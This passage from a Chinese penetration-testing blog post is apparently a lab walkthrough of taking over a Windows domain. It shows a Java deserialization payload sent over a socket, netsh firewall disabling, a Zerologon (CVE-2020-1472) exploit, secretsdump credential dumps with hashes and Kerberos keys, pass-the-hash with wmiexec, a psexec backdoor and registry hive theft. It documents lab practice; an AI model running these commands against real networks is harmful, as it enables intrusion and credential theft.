\u7b2c\u56db\u6b65\uff1a\u901a\u8fc7Socket\u8fde\u63a5\u5230\u76ee\u6807\u670d\u52a1\u5668\uff0c\u53d1\u9001\u6076\u610fpayload\n            Socket socket = new Socket(\"192.168.24.146\", 9999);  \/\/ \u8bf7\u66ff\u6362\u4e3a\u5b9e\u9645\u76ee\u6807IP\u548c\u7aef\u53e3\n            OutputStream outputStream = socket.getOutputStream();\n            ObjectOutputStream objectOutputStream = new ObjectOutputStream(outputStream);\n            objectOutputStream.writeObject(hashMap);  \/\/ \u53d1\u9001\u5305\u542b\u6076\u610fpayload\u7684HashMap\n\n            objectOutputStream.close();\n            outputStream.close();\n            socket.close();\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}<\/code><\/pre>\n\n\n\n
\u5148\u751f\u6210\u4e2a\u9a6c\u5b50\uff0c\u7136\u540e\u5c1d\u8bd5\u5229\u7528\uff0c\u628a\u4e24\u4e2a\u6253\u5305\u6210jar\uff0c\u7136\u540e\u5728web\u673a\u4e0a\u4f20\u4e0a\u53bbgohttp\uff0c\u548cabc.exe\uff0c\u6302\u4e0a\u4ee3\u7406\uff0c\u6309\u7167\u987a\u5e8f\u6267\u884cjar<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u4e0a\u7ebf\u6210\u529f\uff0c\u6743\u9650\u8fd8\u662fsystem<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/p>\n\n\n\n
\u57df\u63a7<\/h2>\n\n\n\n
\u5148\u770b\u770b\u6709\u6ca1\u6709\u9632\u706b\u5899\u5565\u7684<\/p>\n\n\n\n
netsh advfirewall show allprofiles\nnetsh advfirewall set allprofiles state off<\/code><\/pre>\n\n\n\n
\u9632\u706b\u5899\u90fd\u662f\u5173\u7684<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u7136\u540e\u8fdb\u884c\u4e00\u6ce2\u57df\u4fe1\u606f\u6536\u96c6\uff0c\u6402\u4e2ahash\u770b\u770b\uff0c\u57df\u53ebvsmoon.com<\/p>\n\n\n\n
Username\uff1a\nDATA$\nNTLM\uff1a\n3649b51842b196c4980aa9b94ea1d421<\/code><\/pre>\n\n\n\n
DNS\u670d\u52a1\u5668\u662f10.10.10.137<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/p>\n\n\n\n
\u4e0a\u4e2aFscan\u5f00\u626b\uff0c\u5f00\u4e8688,445,139,135\uff0c\u57df\u63a7AD<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u603b\u611f\u89c9\uff0c\u80fd\u6545\u6280\u91cd\u65bd\u4e00\u4e0b\uff0c\u6211\u76f4\u63a5\u4e0aCVE-2020-1472\u5148\u63a2\u4e00\u624b\uff0c\u6302\u4e0a\u4ee3\u7406\uff0c\u5f00\u6d4b<\/p>\n\n\n\n
python zerologon_tester.py AD 10.10.10.137<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u597d\u597d\u597d\uff0c\u8fd8\u771f\u6709\uff0c\u8001\u6837\u5b50<\/p>\n\n\n\n
\u7f6e\u7a7a\uff0c\u6293hash\uff0c\u6765\u4e00\u5957<\/p>\n\n\n\n
python set_empty_pw.py AD 10.10.10.137<\/code><\/pre>\n\n\n\n
\u6211\u8fd8\u4ee5\u4e3a\u8dd1\u4e0d\u51fa\u6765\u4e86\uff0c\u8dd1\u4e86\u597d\u4e45<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u6293hash<\/p>\n\n\n\n
secretsdump.exe vsmoon\/AD$@10.10.10.137 -no-pass<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied\n[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\n[*] Using the DRSUAPI method to get NTDS.DIT secrets\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:66120f7b66195b694faeabc4e3b6752d:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:9307d2f925e8c9025ff452c0f6681313:::\nvsmoon.com\\data:1104:aad3b435b51404eeaad3b435b51404ee:3e9b45207bedfe4877c5567673e19d01:::\nAD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDATA$:1105:aad3b435b51404eeaad3b435b51404ee:3649b51842b196c4980aa9b94ea1d421:::\n[*] Kerberos keys grabbed\nkrbtgt:aes256-cts-hmac-sha1-96:134e1843ce6aa68b586b93f6b33b67adf26ae3dc9cab78be617eaf538bbbfcd0\nkrbtgt:aes128-cts-hmac-sha1-96:b1284e87a3414a984d5295801f10ddc1\nkrbtgt:des-cbc-md5:133723fdc7970d4a\nvsmoon.com\\data:aes256-cts-hmac-sha1-96:8dbb79f54eb6160e00f424386eed8650b19a76f7a870732cd21df63cd5139e99\nvsmoon.com\\data:aes128-cts-hmac-sha1-96:eb597a5e13b47685916dc3406e8028ce\nvsmoon.com\\data:des-cbc-md5:6e2f6e6da2e96bf4\nAD$:aes256-cts-hmac-sha1-96:a7c23d712488d3c211bf50cc4cff225bc0781a86ba5d46d43fd18bedca68f2d6\nAD$:aes128-cts-hmac-sha1-96:1d3cbd31aba22311b1f5fb61eeca2e0e\nAD$:des-cbc-md5:26d9235845d07643\nDATA$:aes256-cts-hmac-sha1-96:7d71a5d6aa75fed095ecd2b9e5ad417e95b7649cb2af9a6d9b1133ec0b87fcca\nDATA$:aes128-cts-hmac-sha1-96:b78e676f3c83f5c72673b78628f8eed2\nDATA$:des-cbc-md5:5bf72c15f8389491<\/code><\/pre>\n\n\n\n
wmiexec\u8fde\u4e0a\u53bb<\/p>\n\n\n\n
python wmiexec-pro.py -hashes aad3b435b51404eeaad3b435b51404ee:66120f7b66195b694faeabc4e3b6752d vsmoon\/Administrator@10.10.10.137 exec-command -command \"whoami\"<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u7136\u540e\u5173\u6389\u9632\u706b\u5899<\/p>\n\n\n\n
python wmiexec-pro.py -hashes aad3b435b51404eeaad3b435b51404ee:66120f7b66195b694faeabc4e3b6752d vsmoon\/Administrator@10.10.10.137 exec-command -command \"netsh advfirewall set allprofiles state off\"<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
PTH\u8fde\u4e0a\u53bb<\/p>\n\n\n\n
pth vsmoon\\Administrator 66120f7b66195b694faeabc4e3b6752d<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u6b63\u5411\u4f20\u9a6c<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u5728PTH\u8fde\u63a5\u540e\u7684\u9a6c\u5b50\u4e2d\u4f20\u5165\u540e\u95e8\uff1a\njump psexec64 10.10.10.137 ZX<\/code><\/pre>\n\n\n\n
\u4e0a\u7ebf\u6210\u529f<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u8001\u6837\u5b50\uff0c\u6536\u5c3e\u5de5\u4f5c<\/p>\n\n\n\n
shell reg save HKLM\\SYSTEM c:\\Users\\Administrator\\system.save\nshell reg save HKLM\\SAM c:\\Users\\Administrator\\sam.save\nshell reg save HKLM\\SECURITY c:\\Users\\Administrator\\security.save<\/code><\/pre>\n\n\n\n
\u4e0b\u8f7d\u4e0b\u6765<\/p>\n\n\n\n
\u672c\u5730\u6293\u4e00\u6b21<\/p>\n\n\n\n
secretsdump.exe -sam sam.save -system system.save -security security.save LOCAL<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
[*] Target system bootKey: 0xb34b17556cade716de1f36076e43efdb\n[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:66120f7b66195b694faeabc4e3b6752d:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:a711c97a7551203389aaed828a12d896:::\n[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)\n[*] Dumping LSA Secrets\n[*] $MACHINE.ACC\n$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:1107cbbbb24ece79735df966cf75525d\n[*] DefaultPassword\n(Unknown User):ROOT#123\n[*] DPAPI_SYSTEM\n 0000   01 00 00 00 F7 62 02 24  A6 6B 0B 07 CC 3E 0B 45   .....b.$.k...>.E\n 0010   26 3C 52 AA 64 3A 0C FE  4F D6 A5 52 1F D0 1D 1B   &<R.d:..O..R....\n 0020   B0 47 84 3E D1 41 84 0A  B2 60 31 80               .G.>.A...`1.\nDPAPI_SYSTEM:01000000f7620224a66b0b07cc3e0b45263c52aa643a0cfe4fd6a5521fd01d1bb047843ed141840ab2603180\n[*] NL$KM\n 0000   A3 1B 0C 50 A7 32 09 2A  43 02 DD DA 2B 89 B4 FD   ...P.2.*C...+...\n 0010   AA 4C BD 16 91 F8 C7 D5  A1 F1 26 F3 6A CD A4 00   .L........&.j...\n 0020   0E 06 AC FF 45 88 79 C6  EF B6 1C 87 9F A5 C0 C0   ....E.y.........\n 0030   72 C0 D7 32 48 A1 A7 10  F0 40 50 9F A3 92 BE 34   r..2H....@P....4\nNL$KM:a31b0c50a732092a4302ddda2b89b4fdaa4cbd1691f8c7d5a1f126f36acda4000e06acff458879c6efb61c879fa5c0c072c0d73248a1a710f040509fa392be34\n[*] Cleaning up...<\/code><\/pre>\n\n\n\n
NTLM\uff1a1107cbbbb24ece79735df966cf75525d<\/code><\/pre>\n\n\n\n
\u6302\u4e0a\u4ee3\u7406\uff0c\u8fd8\u539fhash<\/p>\n\n\n\n
python reinstall_original_pw.py ad 10.10.10.137 1107cbbbb24ece79735df966cf75525d<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u9a8c\u8bc1\u4e00\u904d<\/p>\n\n\n\n
secretsdump.exe vsmoon\/AD$@10.10.10.137 -no-pass<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u7ed3\u675f\uff01<\/p>\n\n\n\n
\u5c0f\u603b\u7ed3<\/h2>\n\n\n\n
    \u8fd9\u4e2a\u9776\u573a\u7a0d\u5fae\u5b66\u4e86\u4e00\u4e9b\u4ee3\u7801\u5ba1\u8ba1\uff0c\u719f\u6089\u4e86\u4e00\u4e0b\u57df\u6a2a\u5411\uff0c\u76ee\u524d\u611f\u89c9\uff0c\u9776\u573a\u62ff\u57df\u63a7\u57fa\u672c\u4e0a\u90fd\u662f2020-1472\uff0c\u4e0d\u77e5\u9053\u4e0b\u4e00\u4e2a\u9776\u573a\u4f1a\u4e0d\u4f1a\u6709\u6539\u53d8<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u5f00\u65b0\u7bc7\u7ae0\uff0c\u8df3\u8fc7\u642d\u5efa\uff0c\u7b80\u5355\u4ecb\u7ecd\u4e00\u4e0b webIP\uff1a192.168.0.102 WEB\u90e8\u5206 \u5148\u4e0agoby\u626b\u4e00\u626b 16 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-611","post","type-post","status-publish","format-standard","hentry","category-shentouceshi"],"_links":{"self":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/611","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/comments?post=611"}],"version-history":[{"count":58,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/611\/revisions"}],"predecessor-version":[{"id":731,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/611\/revisions\/731"}],"wp:attachment":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/media?parent=611"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/categories?post=611"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/tags?post=611"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}